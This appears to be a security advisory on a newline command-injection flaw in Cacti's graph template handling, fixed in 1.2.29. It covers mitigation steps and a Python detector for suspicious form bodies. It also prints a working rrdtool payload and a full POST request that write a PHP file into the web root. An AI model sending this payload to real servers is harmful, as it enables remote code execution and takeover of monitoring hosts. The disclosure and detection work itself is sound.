Cacti Vulnerability Allows Remote Code Execution Through Graph Creation

A significant security vulnerability exists in Cacti, a popular network monitoring tool. This flaw allows authenticated users to exploit the graph creation and template functionalities, potentially leading to the execution of arbitrary PHP scripts within the application’s web root.

Affected Cacti Versions

  • Package: Cacti (PHP)
  • Affected Versions: <= 1.2.28
  • Patched Version: 1.2.29

Technical Overview

Cacti uses the rrdtool binary to generate graphs and images from Round Robin Databases (RRDs). Users can also change various settings through the web interface, in particular while creating graphs or editing graph templates. However, the sanitization applied to these inputs before they are passed to rrdtool is inadequate, which opens the door to command injection.

Flaw in Input Sanitization

The function cacti_escapeshellarg() aims to sanitize user inputs by escaping shell metacharacters. Unfortunately, it does not handle newline characters. Consequently, an attacker can embed several newline-separated rrdtool commands in a single field value, and each of them is executed as a separate command.

For instance, an attacker can craft a payload that creates a new RRD database and generates a PHP file containing malicious code:

create my.rrd --step 300 DS:temp:GAUGE:600:-273:5000 RRA:AVERAGE:0.5:1:1200
graph xxx2.php -s now -a CSV DEF:out=my.rrd:temp:AVERAGE LINE1:out:<?=phpinfo();?>

Exploitation Methodology

To exploit this vulnerability, an attacker injects a malicious payload by leveraging the graph creation or template functionality. When the system processes this payload during the invocation of the rrdtool binary, it creates a PHP file in the web root. Subsequently, attackers can access this file to run arbitrary code.

Example of Exploitation

Here is an example of a POST request that triggers this vulnerability:

POST http://<target-ip>/cacti/graph_templates.php?header=false HTTP/1.1
Host: <target-ip>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
...
right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A

When executed, this payload creates a file named xxx2.php in the web root. Consequently, attackers can access this file to execute the embedded PHP code.

Potential Impact

The ability to write arbitrary PHP scripts to the web root poses severe security risks, including remote code execution. Since authenticated users can exploit this vulnerability, organizations using Cacti must take immediate action to mitigate the associated risks.

Recommended Mitigation Measures

  1. Update Cacti: Ensure you run the latest version of Cacti (1.2.29 or later) to address this vulnerability.
  2. Limit User Permissions: Restrict authenticated users’ permissions to prevent unauthorized access to sensitive functionalities.
  3. Enhance Input Validation: Implement stricter input validation and sanitization measures to thwart command injection attacks.
  4. Monitor Server Logs: Regularly review server logs for suspicious activity that may indicate attempts to exploit this vulnerability.
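
As an added detection example (not code from the original post or from the Cacti project), the following Python check applies the newline bypass described above to a captured form body: it percent-decodes each parameter and flags any line after the first that begins with an rrdtool subcommand, which is how a request-log review for item 4 could spot the request shown earlier. The sample bodies are constructed; the malicious one reuses the request body from this write-up, and the list of rrdtool subcommands is assumed from rrdtool's documented command set.

```python
"""Flag Cacti form bodies whose fields smuggle extra rrdtool commands via CR/LF."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# rrdtool subcommands: a smuggled line has to start with one of these to do anything.
RRDTOOL_SUBCOMMANDS = {
    "create", "update", "updatev", "graph", "graphv", "dump", "restore",
    "fetch", "xport", "tune", "info", "first", "last", "lastupdate",
}
# Heuristic for a PHP open tag inside the smuggled line (<?php, <?=, <?).
PHP_TAG = re.compile(r"<\?(php|=)?", re.IGNORECASE)


def find_newline_injection(form_body: str) -> list[dict]:
    """Return one finding per rrdtool command hidden behind a line break in any field."""
    findings = []
    # parse_qsl percent-decodes, so %0A in the wire body arrives here as a real newline.
    for field, value in parse_qsl(form_body, keep_blank_values=True):
        lines = re.split(r"\r\n|\r|\n", value)
        if len(lines) < 2:
            continue  # single line: nothing for rrdtool to read as a second command
        for extra in lines[1:]:
            tokens = extra.strip().split()
            if not tokens or tokens[0].lower() not in RRDTOOL_SUBCOMMANDS:
                continue
            target = tokens[1] if len(tokens) > 1 else None  # create/graph: output file
            findings.append({
                "field": field,
                "subcommand": tokens[0].lower(),
                "target": target,
                "writes_php": bool(target) and target.lower().endswith(".php"),
                "php_tag": bool(PHP_TAG.search(extra)),
            })
    return findings


# Constructed samples: the body from the POST request above, and a benign edit.
MALICIOUS_BODY = (
    "right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000"
    "+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp"
    "%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A"
)
BENIGN_BODY = "right_axis_label=Temperature+%28C%29&vertical_label=degrees"

if __name__ == "__main__":
    for finding in find_newline_injection(MALICIOUS_BODY):
        print(finding)
```

A hit with writes_php set is the strongest signal: it names the file to look for in the web root.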
